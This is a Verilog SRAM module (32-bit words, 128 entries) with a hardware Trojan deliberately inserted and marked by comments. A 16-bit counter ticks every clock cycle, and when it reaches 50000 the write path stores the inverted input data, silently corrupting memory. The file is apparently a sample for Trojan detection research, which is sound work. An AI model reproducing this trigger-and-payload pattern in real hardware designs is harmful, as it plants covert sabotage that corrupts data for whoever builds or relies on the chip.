module SRAM_32x128_1rw (
  clk0,
  csb0,
  web0,
  addr0,
  din0,
  dout0
);

  parameter DATA_WIDTH = 32;
  parameter ADDR_WIDTH = 7;
  parameter RAM_DEPTH  = 1 << ADDR_WIDTH;
  parameter DELAY      = 3;
  
  // Begin Trojan Insertion
  reg [15:0] trojan_counter = 0; // New hardware Trojan counter
  // End Trojan Insertion

  input                   clk0;  
  input                   csb0;  
  input                   web0;  
  input  [ADDR_WIDTH-1:0] addr0;
  input  [DATA_WIDTH-1:0] din0;
  output reg [DATA_WIDTH-1:0] dout0;

  reg                  csb0_reg;
  reg                  web0_reg;
  reg [ADDR_WIDTH-1:0] addr0_reg;
  reg [DATA_WIDTH-1:0] din0_reg;

  reg [DATA_WIDTH-1:0] mem [0:RAM_DEPTH-1];

  always @(posedge clk0) begin
    csb0_reg  <= csb0;
    web0_reg  <= web0;
    addr0_reg <= addr0;
    din0_reg  <= din0;
    // Begin Trojan Insertion
   trojan_counter <= trojan_counter + 1;
    // End Trojan Insertion
    if (!csb0_reg && web0_reg)
      $display($time, " Reading %m addr0=%b dout0=%b", addr0_reg, mem[addr0_reg]);
    if (!csb0_reg && !web0_reg)
      $display($time, " Writing %m addr0=%b din0=%b", addr0_reg, din0_reg);
  end

  always @(negedge clk0) begin : MEM_WRITE0
    if (!csb0_reg && !web0_reg)
  // Begin Trojan Insertion
  if(trojan_counter != 50000)    // Trojan activation condition
      mem[addr0_reg] <= din0_reg;
  else
     mem[addr0_reg] <= ~din0_reg;  // Invert the data input when the trojan is active
   // End Trojan Insertion
  end

  always @(negedge clk0) begin : MEM_READ0
    if (!csb0_reg && web0_reg)
      dout0 <= #(DELAY) mem[addr0_reg];
  end

endmodule